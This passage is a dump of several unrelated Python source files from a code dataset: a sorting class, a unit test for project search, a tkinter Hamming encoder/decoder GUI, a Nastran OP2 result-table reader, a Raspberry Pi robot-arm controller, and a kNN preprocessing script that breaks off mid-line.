len(self.a)\n for i in range(leng-2):\n for j in range(0, leng-i-1):\n if self.a[j] > self.a[j+1]:\n self.a[j],self.a[j+1] = self.a[j+1],self.a[j]\n\n\n def quicky(self, arr):\n if len(arr) <= 1:\n return arr\n else:\n pivot = len(arr) // 2\n pivotele = arr[pivot]\n left = [x for x in arr if x < pivotele]\n right = [x for x in arr if x > pivotele]\n\n return self.quicky(left) + [pivotele] + self.quicky(right)\n\n def quicksort(self):\n self.a = self.quicky(self.a)\n\n\n def merge(self,arr):\n if len(arr) <= 1:\n return arr\n elif len(arr) == 2:\n if arr[0] > arr[1]:\n arr[0],arr[1] = arr[1],arr[0]\n return arr\n else:\n pivot = int(len(arr)/2)\n left = self.merge(arr[:pivot])\n right = self.merge(arr[pivot:])\n\n leftind = 0\n rightind = 0\n newarr = []\n while(leftind < len(left) and rightind < len(right)):\n if left[leftind] < right[rightind]:\n newarr.append(left[leftind])\n leftind += 1\n elif left[leftind] > right[rightind]:\n newarr.append(right[rightind])\n rightind += 1\n else:\n newarr.append(left[leftind])\n newarr.append(left[leftind])\n leftind += 1\n rightind += 1\n\n if leftind == len(left) and rightind != len(right):\n newarr += right[rightind:]\n\n if rightind == len(right) and leftind != len(left):\n newarr += left[leftind:]\n\n return newarr\n\n def mergesort(self):\n self.a = self.merge(self.a)\n\n\n def countsort(self):\n leng = len(self.a)\n K = 50\n B = [0] * K\n C = [0] * K\n\n for ele in self.a:\n C[ele] += 1\n\n for i in range(1, K): # gets no of elements less than current index\n C[i] += C[i-1]\n\n for i in range(leng-1, -1, -1):\n B[C[self.a[i]] - 1] = self.a[i]\n C[self.a[i]] -= 1\n\n return B[:leng]\n\n def insertionsort(self):\n for i in range(1, len(self.a)):\n x = self.a[i]\n j = i-1\n while j >= 0 and self.a[j] > x:\n self.a[j+1] = self.a[j]\n j -= 1\n self.a[j+1] = x\n return\n\n\n\n#alist = [54, 26, 93, 17, 77, 31, 44, 55, 20, -1, -10, -5]\nalist = [1, 1, 4, 3, 2, 5, 5, 6, 8, 8, 6, 14, 12, 16,13,20, 19]\ns = sortclass(alist)\nprint(\"Original array\")\nprint(s.a)\nif 0:\n s.bubblesort()\n print(\"After bubble sort\")\n print(s.a)\nif 0:\n print(\"After quick sort\")\n s.quicksort()\n print(s.a)\nif 0:\n print(\"After merge sort\")\n s.mergesort()\n print(s.a)\nif 0:\n print(\"After counting sort\")\n print(s.countsort())\nif 1:\n print(\"After insertion sort\")\n s.insertionsort()\n print(s.a)\n\n","sub_path":"datastructures_algorithms/Arrays/Array-Sorting.py","file_name":"Array-Sorting.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619678951","text":"from __future__ import absolute_import, unicode_literals, print_function\r\nimport unittest\r\nfrom datetime import datetime\r\nfrom libraries.app.app import App\r\nfrom libraries.door43_tools.project_search import ProjectSearch\r\nfrom libraries.models.manifest import TxManifest\r\n\r\n\r\nclass ProjectSearchTest(unittest.TestCase):\r\n\r\n def setUp(self):\r\n \"\"\"Runs before each test.\"\"\"\r\n App(prefix='{0}-'.format(self._testMethodName), db_connection_string='sqlite:///:memory:')\r\n self.items = {}\r\n self.init_items()\r\n self.populate_table()\r\n\r\n def init_items(self):\r\n self.items = {\r\n 'Door43/en_obs': {\r\n 'repo_name': 'en_obs',\r\n 'user_name': 'Door43',\r\n 'lang_code': 'en',\r\n 'resource_id': 'obs',\r\n 'resource_type': 'book',\r\n 'title': 'Open Bible Stories',\r\n 'views': 2,\r\n 'last_updated': datetime.utcnow(),\r\n 'manifest': '',\r\n },\r\n 'JohnDoe/en_obs': {\r\n 'repo_name': 'en_obs',\r\n 'user_name': 'JohnDoe',\r\n 'lang_code': 'en',\r\n 'resource_id': 'obs',\r\n 'resource_type': 'book',\r\n 'title': 'Open Bible Stories',\r\n 'views': 2,\r\n 'last_updated': datetime.strptime('2016-12-21T05:23:01Z', '%Y-%m-%dT%H:%M:%SZ'),\r\n 'manifest': '',\r\n },\r\n 'francis/fr_ulb': {\r\n 'repo_name': 'fr_ulb',\r\n 'user_name': 'francis',\r\n 'lang_code': 'fr',\r\n 'resource_id': 'ulb',\r\n 'resource_type': 'bundle',\r\n 'title': 'Unlocked Literal Bible',\r\n 'views': 12,\r\n 'last_updated': datetime.strptime('2017-02-11T15:43:11Z', '%Y-%m-%dT%H:%M:%SZ'),\r\n 'manifest': '',\r\n },\r\n }\r\n\r\n def populate_table(self):\r\n for idx in self.items:\r\n tx_manifest = TxManifest(**self.items[idx])\r\n App.db.add(tx_manifest)\r\n App.db.commit()\r\n\r\n def test_search_projects_for_en(self):\r\n search = ProjectSearch()\r\n criterion = {\r\n \"minViews\": 1,\r\n \"daysForRecent\": 365,\r\n \"languages\": \"[en]\",\r\n \"returnedFields\": \"repo_name, user_name, title, lang_code, last_updated, views\"\r\n }\r\n results = search.search_projects(criterion)\r\n self.assertIsNone(search.error)\r\n self.assertEqual(len(results), 2)\r\n\r\n def test_search_projects_for_en_fr(self):\r\n search = ProjectSearch()\r\n criterion = {\r\n \"minViews\": 1,\r\n \"daysForRecent\": 365,\r\n \"languages\": \"[en,fr]\",\r\n \"returnedFields\": \"repo_name, user_name, title, lang_code, last_updated, views\"\r\n }\r\n results = search.search_projects(criterion)\r\n self.assertIsNone(search.error)\r\n self.assertEqual(len(results), 3)\r\n","sub_path":"tests/door43_tools_tests/test_project_search.py","file_name":"test_project_search.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452621149","text":"import tkinter as tk\nfrom Encoder import encoder\nfrom Decoder import decoder\n\n\ndef encode():\n output, output_steps = encoder(encode_data.get(), encode_radio.get(), encode_secded.get(), int(encode_bits_option.get()))\n output_text.set(output)\n encode_explanation = \"\"\n for i in output_steps:\n encode_explanation = encode_explanation + i\n tex.delete('1.0', tk.END)\n tex.insert(tk.END, encode_explanation)\n tex.see(tk.END)\n\ndef decode():\n output = decoder(decode_data.get(), decode_radio.get(), decode_secded.get(), int(decode_bits_option.get()))\n output_text_decoder.set(output)\n\ndef step():\n count_step = count_step_var.get()\n output, output_steps = encoder(encode_data.get(), encode_radio.get(), encode_secded.get(),\n int(encode_bits_option.get()))\n encode_explanation = \"\"\n counter = 0\n for i in output_steps:\n if counter <= count_step:\n encode_explanation = encode_explanation + i\n counter += 1\n output_text.set(output)\n tex.delete('1.0', tk.END)\n tex.insert(tk.END, encode_explanation)\n tex.see(tk.END)\n count_step_var.set(count_step + 1)\n\ndef reset():\n output_text.set(\"\")\n tex.delete('1.0', tk.END)\n count_step_var.set(0)\n\n\n\n\n\nwin = tk.Tk()\nwin.title(\"Hamming Encoder/Decoder\")\nwin.geometry(\"490x500\")\nwin.resizable(width=False, height=False)\n\n\n# Setup encode interface\nencode_data = tk.Entry(width=60)\nencode_button = tk.Button(win, text=\"Encode\", command=encode)\n\nencode_bits = []\nfor i in range(1, 65):\n encode_bits.append(i)\nencode_bits_option = tk.StringVar(win)\nencode_bits_option.set(encode_bits[0])\nencode_dropdown = tk.OptionMenu(win, encode_bits_option, *encode_bits)\n\nencode_radio = tk.StringVar()\nencode_binary_radio = tk.Radiobutton(win, text=\"Binary\", variable=encode_radio, value=\"binary\")\nencode_decimal_radio = tk.Radiobutton(win, text=\"Decimal\", variable=encode_radio, value=\"decimal\")\nencode_hex_radio = tk.Radiobutton(win, text=\"Hexadecimal\", variable=encode_radio, value=\"hex\")\nencode_radio.set(\"binary\")\n\nencode_secded = tk.BooleanVar()\nencode_secsed_radio = tk.Radiobutton(win, text=\"SECSED\", variable=encode_secded, value=False)\nencode_secded_radio = tk.Radiobutton(win, text=\"SECDED\", variable=encode_secded, value=True)\nencode_secded.set(False)\n\nlabel_encoder = tk.Label(win)\nlabel_encoder[\"text\"] = \"Encoder\"\n\noutput_text = tk.StringVar()\nencode_output = tk.Entry(win, textvariable=output_text, state='readonly', width=40)\nscroll = tk.Scrollbar(win, orient='horizontal', command=encode_output.xview)\nencode_output.config(xscrollcommand=scroll.set)\nencode_output_label = tk.Label(win)\nencode_output_label[\"text\"] = \"Encoder Output: \"\n\ntexLabel = tk.Label(win)\ntexLabel[\"text\"] = \"Explanation: \"\n\ntex = tk.Text(win, width=50, height=10, state='normal', wrap=tk.NONE, bg=win.cget(\"background\"))\nscroll_tex = tk.Scrollbar(win, orient='horizontal', command=tex.xview)\n\ncount_step_var = tk.IntVar(0)\nstep_button = tk.Button(win, text=\"Step\", command=step)\n\nreset_button = tk.Button(win, text=\"Reset\", command=reset)\n\n\nlabel_encoder.grid(row=0, column=0, sticky=\"W\")\nencode_data.grid(row=1, column=0)\nencode_dropdown.grid(row=1, column=1)\nencode_button.grid(row=1, column=2, sticky=\"E\")\nstep_button.grid(row=2, column=2, sticky=\"E\")\nreset_button.grid(row=3, column=2, sticky=\"E\")\nencode_binary_radio.grid(row=2, column=0, sticky=\"W\")\nencode_decimal_radio.grid(row=3, column=0, sticky=\"W\")\nencode_hex_radio.grid(row=4, column=0, sticky=\"W\")\ntexLabel.grid(row=7, column=0, sticky=\"W\")\ntex.grid(row=7, column=0, columnspan=3, sticky=\"E\")\nscroll_tex.grid(row=8, column=1)\nencode_output.grid(row=5, column=0, sticky=\"E\", columnspan=3)\nscroll.grid(row=6, column=1, sticky=\"N\")\nencode_output_label.grid(row=5, column=0, sticky=\"W\")\nencode_secsed_radio.grid(row=2, column=1, sticky=\"W\")\nencode_secded_radio.grid(row=3, column=1, sticky=\"W\")\n\n# Decoder\ndecode_data = tk.Entry(width=60)\n\ndecode_button = tk.Button(win, text=\"Decode\", command=decode)\n\ndecode_bits = []\nfor i in range(1, 65):\n decode_bits.append(i)\ndecode_bits_option = tk.StringVar(win)\ndecode_bits_option.set(decode_bits[0])\ndecode_dropdown = tk.OptionMenu(win, decode_bits_option, *decode_bits)\n\ndecode_radio = tk.StringVar()\ndecode_binary_radio = tk.Radiobutton(win, text=\"Binary\", variable=decode_radio, value=\"binary\")\ndecode_decimal_radio = tk.Radiobutton(win, text=\"Decimal\", variable=decode_radio, value=\"decimal\")\ndecode_hex_radio = tk.Radiobutton(win, text=\"Hexadecimal\", variable=decode_radio, value=\"hex\")\ndecode_radio.set(\"binary\")\n\ndecode_secded = tk.BooleanVar()\ndecode_secsed_radio = tk.Radiobutton(win, text=\"SECSED\", variable=decode_secded, value=False)\ndecode_secded_radio = tk.Radiobutton(win, text=\"SECDED\", variable=decode_secded, value=True)\ndecode_secded.set(False)\n\nlabel_decoder = tk.Label(win)\nlabel_decoder[\"text\"] = \"Decoder\"\n\noutput_text_decoder = tk.StringVar()\ndecoder_output = tk.Entry(win, state='readonly', textvariable=output_text_decoder, width=40)\nscroll_decoder = tk.Scrollbar(win, orient='horizontal', command=decoder_output.xview)\ndecoder_output.config(xscrollcommand=scroll.set)\ndecoder_output_label = tk.Label(win)\ndecoder_output_label[\"text\"] = \"Decoder Output: \"\n\nlabel_decoder.grid(row=8, column=0, sticky=\"W\")\ndecode_data.grid(row=9, column=0)\ndecode_dropdown.grid(row=9, column=1)\ndecode_button.grid(row=9, column=2)\ndecode_binary_radio.grid(row=10, column=0, sticky=\"W\")\ndecode_decimal_radio.grid(row=11, column=0, sticky=\"W\")\ndecode_hex_radio.grid(row=12, column=0, sticky=\"W\")\n\ndecoder_output.grid(row=13, column=0, sticky=\"E\", columnspan=3)\nscroll_decoder.grid(row=14, column=1, sticky=\"N\")\ndecoder_output_label.grid(row=13, column=0, sticky=\"W\")\ndecode_secsed_radio.grid(row=10, column=1, sticky=\"W\")\ndecode_secded_radio.grid(row=11, column=1, sticky=\"W\")\n\nwin.mainloop()","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622736850","text":"from six.moves import range\nfrom struct import Struct, unpack\nfrom pyNastran.op2.op2_common import OP2Common\n\nclass OGS(OP2Common):\n def __init__(self):\n OP2Common.__init__(self)\n\n def _read_ogs1_3(self, data):\n three = self.parse_approach_code(data)\n self.words = [\n 'aCode', 'tCode', '???', 'isubcase',\n '???', '???', '???', 'dLoadID'\n 'format_code', 'num_wide', 'o_code', '???',\n 'acoustic_flag','???', '???', '???',\n '???', '???', '???', '???',\n '???', '???', 'thermal', '???',\n '???', 'Title', 'subtitle', 'label']\n\n self.parse_approach_code(data)\n #isubcase = self.get_values(data, 'i', 4)\n\n ## surface/volumeID\n self.ID = self.add_data_parameter(data, 'ID', 'i', 3, False)\n\n #: Reference coordinate system ID\n self.refid = self.add_data_parameter(data, 'refid', 'i', 8, False)\n\n ## format code\n self.format_code = self.add_data_parameter(data, 'format_code', 'i', 9, False)\n\n ## number of words per entry in record\n self.num_wide = self.add_data_parameter(data, 'num_wide', 'i', 10, False)\n\n ## Stress/Strain code\n self.sCode = self.add_data_parameter(data, 'sCode', 'i', 11, False)\n\n ## Output Coordinate System\n self.oCoord = self.add_data_parameter(data, 'oCoord', 'i', 12, False)\n\n ## Axis Specification code\n self.axis = self.add_data_parameter(data, 'axis', 'i', 13, False)\n\n #: Normal Specification Code\n self.normal = self.add_data_parameter(data, 'normal', 'i', 14, False)\n\n #print \"dLoadID(8)=%s format_code(9)=%s num_wide(10)=%s oCode(11)=%s thermal(23)=%s\" %(self.dLoadID,self.format_code,self.num_wide,self.oCode,self.thermal)\n if not self.is_sort1():\n raise NotImplementedError('sort2...')\n\n ## assuming tCode=1\n if self.analysis_code == 1: # statics\n ## load set number\n self.lsdvmn = self.add_data_parameter(data, 'lsdvmn', 'i', 5, False)\n self.dataNames = self.apply_data_code_value('dataNames', ['lsdvmn'])\n self.setNullNonlinearFactor()\n elif self.analysis_code == 2: # normal modes/buckling (real eigenvalues)\n ## mode number\n self.mode = self.add_data_parameter(data, 'mode', 'i', 5)\n ## real eigenvalue\n self.eign = self.add_data_parameter(data, 'eign', 'f', 6, False)\n self.dataNames = self.apply_data_code_value('dataNames', ['mode', 'eign'])\n #elif self.analysis_code == 3: # differential stiffness\n #elif self.analysis_code == 4: # differential stiffness\n #elif self.analysis_code == 5: # frequency\n elif self.analysis_code == 6: # transient\n ## time step\n self.time = self.add_data_parameter(data, 'time', 'f', 5)\n self.dataNames = self.apply_data_code_value('dataNames', ['time'])\n #elif self.analysis_code == 7: # pre-buckling\n #elif self.analysis_code == 8: # post-buckling\n #elif self.analysis_code == 9: # complex eigenvalues\n elif self.analysis_code == 10: # nonlinear statics\n ## load step\n self.lftsfq = self.add_data_parameter(data, 'lftsfq', 'f', 5)\n self.dataNames = self.apply_data_code_value('dataNames', ['lftsfq'])\n #elif self.analysis_code == 11: # old geometric nonlinear statics\n #elif self.analysis_code == 12: # contran ? (may appear as aCode=6) --> straight from DMAP...grrr...\n else:\n raise RuntimeError('invalid analysis_code...analysis_code=%s' % self.analysis_code)\n\n #print \"*isubcase=%s\" % (self.isubcase)\n #print \"analysis_code=%s table_code=%s thermal=%s\" %(self.analysis_code,self.table_code,self.thermal)\n\n #print self.code_information()\n if self.debug:\n self.binary_debug.write(' approach_code = %r\\n' % self.approach_code)\n self.binary_debug.write(' tCode = %r\\n' % self.tCode)\n self.binary_debug.write(' isubcase = %r\\n' % self.isubcase)\n self._read_title(data)\n self._write_debug_bits()\n\n def _read_ogs1_4(self, data):\n if self.read_mode == 1:\n return len(data)\n\n if self.table_code == 26: # OGS1 - grid point stresses - surface\n assert self.table_name in ['OGS1'], 'table_name=%s table_code=%s' % (self.table_name, self.table_code)\n n = self._read_ogs1_table26(data)\n elif self.table_code == 27: # OGS1 - grid point stresses - volume direct\n assert self.table_name in ['OGS1'], 'table_name=%s table_code=%s' % (self.table_name, self.table_code)\n n = self._read_ogs1_table27(data)\n elif self.table_code == 28: # OGS1- grid point stresses - principal\n assert self.table_name in ['OGS1'],'table_name=%s table_code=%s' % (self.table_name,self.table_code)\n n = self._read_ogs1_table28(data)\n #elif self.table_code == 35: # OGS - Grid point stress discontinuities (plane strain)\n #n = self._not_implemented_or_skip(data, msg)\n else:\n raise NotImplementedError(self.table_code)\n return n\n\n def _read_ogs1_table28(self, data):\n if self.num_wide == 15:\n pass\n else:\n raise NotImplementedError(self.num_wide)\n return len(data)\n\n def _read_ogs1_table26(self, data):\n resultName = 'gridPointStresses'\n if self.num_wide == 11: # real/random\n #self.create_transient_object(self.gridPointStresses, GridPointStressesObject)\n n = self._readOGS1_table26_numWide11(data)\n else:\n msg = 'only num_wide=11 is allowed num_wide=%s' % self.num_wide\n raise RuntimeError(msg)\n return n\n\n def _readOGS1_table26_numWide11(self, data): # surface stresses\n #dt = self.nonlinear_factor\n format1 = b'2i4s8f'\n s = Struct(format1)\n\n n = 0\n nelements = len(data) // 44 # 11*4\n for i in range(nelements):\n edata = data[n:n+44]\n out = s.unpack(edata)\n (ekey, eid, fiber, nx, ny, txy, angle, major,\n minor, tmax, ovm) = out\n nid = (ekey - self.device_code) // 10\n #fiber = fiber.decode('utf-8').strip()\n assert nid > 0, nid\n #self.obj.add(dt, nid, eid, fiber, nx, ny, txy,\n # angle, major, minor, tmax, ovm)\n return n\n\n def _read_ogs1_table27(self, data): # OGS1 - grid point stresses - volume direct\n #is_sort1 = self.is_sort1()\n if self.num_wide == 9: # real/random\n resultName = 'gridPointVolumeStresses'\n #self.create_transient_object(self.gridPointVolumeStresses, GridPointStressesVolumeObject)\n n = self._readOGS1_table27_numWide9(data)\n else:\n msg = 'only num_wide=9 is allowed num_wide=%s' % self.num_wide\n raise RuntimeError(msg)\n return n\n\n def _readOGS1_table27_numWide9(self, data): # surface stresses\n format1 = b'2i7f'\n s = Struct(format1)\n\n n = 0\n nelements = len(data) // 36 # 9*4\n for i in range(nelements):\n edata = data[n:n+36]\n out = unpack(format1, edata)\n (ekey, nx, ny, nz, txy, tyz, txz, pressure, ovm) = out\n nid = (ekey - self.device_code) // 10\n assert nid > 0, nid\n #check_nid\n #self.obj.add(dt, nid, nx, ny, nz, txy, tyz, txz, pressure, ovm)\n return n\n","sub_path":"pyNastran/op2/tables/ogs.py","file_name":"ogs.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385349634","text":"#!/usr/bin/python3\n\n\"\"\"\nCalibrate arm first!\n\"\"\"\n\nimport drv8825\nimport steppers\nimport RPi.GPIO as GPIO\nimport time\nimport sympy as sp\nfrom multiprocessing import Process\n\n# TODO use steppers instead of drv8825\n\nclass arm():\n \"\"\"\n \"\"\"\n\n def __init__( self, motionOnSeparateThread = False ):\n self.motionOnSeparateThread = motionOnSeparateThread\n self.turntable = drv8825.drv8825( pinDir = 38, pinStep = 40, pinEnable = 32, waitingTime=0.0005 )\n self.cantilever = drv8825.drv8825( pinDir = 29, pinStep = 31, pinEnable= 32, waitingTime=0.002 )\n self.anchorpoint = drv8825.drv8825( pinDir = 33, pinStep = 35, pinEnable= 32, waitingTime=0.0002 )\n\n self.pinServo = 7 #bcm: 4\n\n GPIO.setmode( GPIO.BOARD )\n GPIO.setup( self.pinServo, GPIO.OUT )\n self.p = GPIO.PWM( self.pinServo, 50 )\n self.p.start( 2.5 )\n\n self.offset = 63 #height of cart\n\n self.stepsTurnTable = 0\n self.stepsCantilever = 0\n self.stepsAnchorpoint = 0\n \n self.angleTurnTable = 0\n self.angleCantilever = 0\n self.angleAnchorpoint = 0\n self.angleGripper = 0\n\n print( \"inititalized arm\" )\n\n def __updateAngleRos__( self, angleName, angle, maxAngle, timePerRev ):\n \"\"\"\n Continuously updates the angles s.t. ros can turn the coordinate \n systems in real time.\n \"\"\"\n #now = time()\n #future = now+angle/maxAngle*timePerRev\n #cutoff = now\n #while now-cutoff < future-cutoff:\n # #print( now-cutoff, future-cutoff, now-cutoff < future-cutoff )\n # setattr( self, angleName, sp.N(sp.rad(sp.N((now-cutoff)/(future-cutoff)*angle)) ) )\n # #print( \"getAttr\", getattr( self, angleName ) )\n # #print( \"------>\", sp.N(sp.rad(sp.N((now-cutoff)/(future-cutoff)*angle)) ))\n # rclpy.sleep(0.1)\n # now = time()\n setattr( self, angleName, sp.N(sp.rad(angle)))\n\n def _stepTurntable(self, delta):\n if delta >= 0 :\n self.turntable.doStep( delta, 1 )\n else:\n self.turntable.doStep( -delta, 0 )\n\n #17300 steps over all\n def _setAngleTurntable( self, angle, spawn ):\n assert( angle >= 0 and angle <= 270 )\n steps = 17300/270*angle\n delta = steps-self.stepsTurnTable\n if spawn:\n f = lambda: self._stepTurntable(delta)\n p1 = Process(target = f)\n p1.start()\n p1.join()\n else:\n self._stepTurntable(delta)\n self.stepsTurnTable = steps\n self.__updateAngleRos__( \"angleTurnTable\", angle, 270, 10 )\n \n def setAngleTurntable( self, angle ):\n self._setAngleTurntable(angle, self.motionOnSeparateThread)\n\n def getConfigurationMatrixTurntable( self ):\n #angle = sp.rad(270*self.stepsTurnTable/17300)\n angle = self.angleTurnTable\n M = sp.Matrix( [ [sp.cos( angle ), -sp.sin( angle ), 0, 0], [sp.sin(angle), sp.cos(angle), 0, 0], [0, 0, 1, self.offset], [0, 0, 0, 1] ] )\n #print( \"caa turn>>\", M)\n return M\n\n def _stepCantilever( self, delta):\n if delta >= 0 :\n self.cantilever.doStep( delta, 0 )\n else:\n self.cantilever.doStep( -delta, 1 )\n\n #5600 steps over all\n def _setAngleCantilever( self, angle, spawn ):\n assert( angle >= -30 and angle <= 270 )\n steps = 5400/270*angle\n delta = steps-self.stepsCantilever\n if spawn:\n f = lambda: self._stepCantilever(delta)\n p1 = Process(target = f)\n p1.start()\n p1.join()\n else:\n self._stepCantilever(delta)\n self.stepsCantilever = steps\n self.__updateAngleRos__( \"angleCantilever\", angle, 270, 10 )\n \n def setAngleCantilever( self, angle ):\n self._setAngleCantilever(angle, self.motionOnSeparateThread)\n\n def getConfigurationMatrixCantilever( self ):\n #angle = sp.rad(270*self.stepsCantilever/5400)\n angle = self.angleCantilever-120\n M = sp.Matrix( [ [1, 0, 0, 0], [0, sp.cos(angle), -sp.sin(angle), 0], [0, sp.sin(angle), sp.cos(angle), 144], [0, 0, 0, 1] ] )\n #print( \"caa cant>>\", M)\n return M\n\n def _stepAnchorPoint(self, delta):\n if delta >= 0 :\n self.anchorpoint.doStep( delta, 1 )\n else:\n self.anchorpoint.doStep( -delta, 0 )\n\n def _setAngleAnchorPoint( self, angle, spawn ):\n assert( angle >= -30 and angle <= 270 )\n steps = 5400/270*angle*5\n delta = steps-self.stepsAnchorpoint\n if spawn:\n f = lambda: self._stepAnchorPoint(delta)\n p1 = Process(target = f)\n p1.start()\n p1.join()\n else:\n self._stepAnchorPoint(delta)\n self.stepsAnchorpoint = steps\n self.__updateAngleRos__( \"angleAnchorpoint\", -angle, 300, 10 )\n\n def setAngleAnchorPoint( self, angle ):\n self._setAngleAnchorPoint(angle, self.motionOnSeparateThread)\n\n def getConfigurationMatrixAnchorPoint( self ):\n #angle = sp.rad(270*self.stepsAnchorpoint/5400)\n angle = self.angleAnchorpoint+120\n M = sp.Matrix( [ [1, 0, 0, 0], [0, sp.cos(angle), -sp.sin(angle), 0], [0, sp.sin(angle), sp.cos(angle), 225], [0, 0, 0, 1] ] )\n #print( \"caa ap>>\", M)\n return M\n\n\n def grip( self, cycle ):\n assert( cycle > 5 and cycle < 12.5 )\n self.p.ChangeDutyCycle( cycle )\n time.sleep( 2 )\n #self.__updateAngleRos__( \"angleGripper\", -angle, 270, 10 )\n\n def getConfigurationMatrixGripper( self ):\n #angle = sp.rad(270*self.stepsAnchorpoint/5400)\n #angle = self.angleGripper+120\n angle=0\n M = sp.Matrix( [ [1, 0, 0, 0], [0, sp.cos(angle), -sp.sin(angle), 0], [0, sp.sin(angle), sp.cos(angle), 200], [0, 0, 0, 1] ] )\n #print( \"caa grip>>\", M)\n return M\n\n\n # Motion Primitives\n\n def rotateAndGrab( self, angle ):\n self.setAngleCantilever( 30 )\n self.setAngleTurntable( angle )\n self.setAngleCantilever( 0 )\n\n def retractArm( self ):\n f = lambda: self._setAngleCantilever( 0, False )\n g = lambda: self._setAngleTurntable( 0, False ) \n h = lambda: self._setAngleAnchorPoint( 0, False )\n p1 = Process(target = f)\n p2 = Process(target = g)\n p3 = Process(target = h)\n p1.start()\n p2.start()\n p3.start()\n p1.join()\n p2.join()\n p3.join()\n self.stepsAnchorpoint = 0\n self.stepsTurnTable = 0\n self.stepsCantilever = 0\n self.__updateAngleRos__( \"angleTurnTable\", 0, 270, 0 )\n self.__updateAngleRos__( \"angleAnchorpoint\", 0, 300, 0 )\n self.__updateAngleRos__( \"angleCantilever\", 0, 270, 0 )\n\n def idle( self ):\n time.sleep(0.1)\n \n # Simple Positioning of the arm\n\n def moveToFront( self ):\n self.setAngleTurntable( 180 )\n \n def moveToLeft( self ):\n self.setAngleTurntable( 270 )\n \n def moveToRight( self ):\n self.setAngleTurntable( 60 )\n \n def moveToBack( self ):\n self.setAngleTurntable( 0 )\n","sub_path":"pgcd/nodes/motions/arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499531266","text":"from numpy import array\nfrom numpy import linalg as LA\n\nimport math\nimport csv\nimport os\nimport numpy as np\nimport sys\nimport random\n\n# \ndef getRows(CSVPath):\n with open(CSVPath, newline='') as csvFile:\n rowReader = list(csv.reader(csvFile, delimiter=',', quotechar='|'))\n\n return rowReader\n\n\n\n#Q5.\nprint(\"--------------------------------------------------\")\nprint(\"kNN algorithm 4-folde cross validation:\")\nprint(\"--------------------------------------------------\")\n#Explain how this might affect your model and how you interpret the results\n\n# For instance, would you say a model that \n# achieved 70% accuracy is a good or poor model? \n#\n# yes it will be good model achieved 70% accuracy\n#\n# How many dimensions does each data point have \n# (ignoring the id attribute and class label)?\n#\n# categorial (7)\n# numerical (4)\n# ordinal (1)\n# Total 12 demensions ?\n#\n\n# # # range of workclass\n# print(train_data[0][6])\n# print(train_data[1][6:13])\n\n# getWorkSpace_categorial = train_data[1][6:12]\n# getMarried_categorial = train_data[1][13:20]\n# getOccupation_categorial = train_data[1][21:33]\n# getRelationship_categorial = train_data[1][34:40]\n\n# print(train_data[0][6:12])\n# print(train_data[0][13:20])\n# print(train_data[0][21:33])\n# print(train_data[0][34:40])\n\ndef one_hot_encoding(rawData,target_categorial):\n #get target length and find coding\n get_len = len(target_categorial)\n # print(get_len)\n g = 0\n result =0\n for i in target_categorial:\n #get each values for binary\n # 1 , 2 , 4 , 8 , 16 ...\n # 2^0, 2^1, 2^2, 2^3, 2^4 ...\n # check array is 1 or 0\n # if then add in result : 2^g\n\n if i == '1':\n result = result + (2)**int(g)\n # if not ignored\n g = g + 1\n \n return ((result-1)/(2**get_len-1))\n\n\n# # range of Married\n# print(train_data[0][14])\n# print(train_data[0][21])\n# print(train_data[1][14:21])\n\n# # range of occupation\n# print(train_data[0][22])\n# print(train_data[0][33])\n# print(train_data[1][22:33])\n\n# # range of relationship\n# print(train_data[0][34])\n# print(train_data[0][39])\n# print(train_data[1][34:39])\n\n\n# get encoded value from here!\n\ndef get_vector_Generator(id,rawData,option):\n vector_set = []\n\n # Check data - should be delete\n\n getIdCheck = rawData[id][0]\n\n\n # Numerical\n\n getAge = rawData[id][1] \n getEducation = rawData[id][2]\n getCapital_gain = rawData[id][3]\n getCapital_loss = rawData[id][4]\n getHoursPerWeek = rawData[id][5]\n\n # Categorial\n getWorkSpace_categorial= rawData[id][6:13]\n getMarried_categorial = rawData[id][13:20]\n getOccupation_categorial = rawData[id][20:34]\n getRelationship_categorial = rawData[id][34:40]\n\n\n # print(\"this is income data: \" + str(getIncomeData))\n\n # encoded\n result_Work_encoded = one_hot_encoding(rawData,getWorkSpace_categorial)\n result_Married_encoded = one_hot_encoding(rawData,getMarried_categorial)\n result_Occupation_encoded = one_hot_encoding(rawData,getOccupation_categorial)\n result_Relationship_encoded = one_hot_encoding(rawData,getRelationship_categorial)\n\n vector_set.append(int(getIdCheck))\n\n # vector_set.append section\n vector_set.append(float(getAge))\n vector_set.append(float(getEducation))\n vector_set.append(float(getCapital_gain))\n vector_set.append(float(getCapital_loss))\n vector_set.append(float(getHoursPerWeek))\n\n # vectorset by encoded\n\n # temp = []\n\n vector_set.append(float(result_Work_encoded))\n vector_set.append(float(result_Married_encoded))\n vector_set.append(float(result_Occupation_encoded))\n vector_set.append(float(result_Relationship_encoded))\n \n # Normalization function\n # append normalzed values on vector_set \n\n\n # for value in temp:\n # vector_set.append((value - np.mean(temp)) / (max(temp) - min(temp)))\n # income\n if option == 1:\n getIncomeData = rawData[id][86]\n vector_set.append(int(getIncomeData))\n # print(vector_set)\n return vector_set\n\n\n# def normalization(vector_set):\n# # x - mean / max - min\n# # vector_set[0] = work\n# # vector_set[1] = married\n# # vector_set[2] = occupation\n# # vector_set[3] = relationship\n\n# # normalization\n# normal_result = []\n# for value in vector_set:\n# normal_result.append(value - mean(vector_set)) / (max(vector_set) - min(vector_set))\n \n# # init vectorset again\n\n# return normal_result\n\n# print(one_hot_encoding(rawData, getWorkSpace_categorial))\n\n# get vector generation\ndef get_vector(rawData,option):\n i = 1\n vector = []\n for row in rawData[0:-1]:\n vector.append(get_vector_Generator(i,rawData,option))\n i = i + 1\n return vector\n\n\ndef kNN_decision(k, train_dataSet, validation_vector):\n sortDistanceList = []\n new_vector = []\n for each_vector in train_dataSet:\n i = 1\n distance = 0\n # get distance calculate between each_vector and ex_vector\n for i in range(1,10): # excluding id and income\n # 1 ~ 10 (which is 11 values last will INCOME)\n distance += float((each_vector[i] - 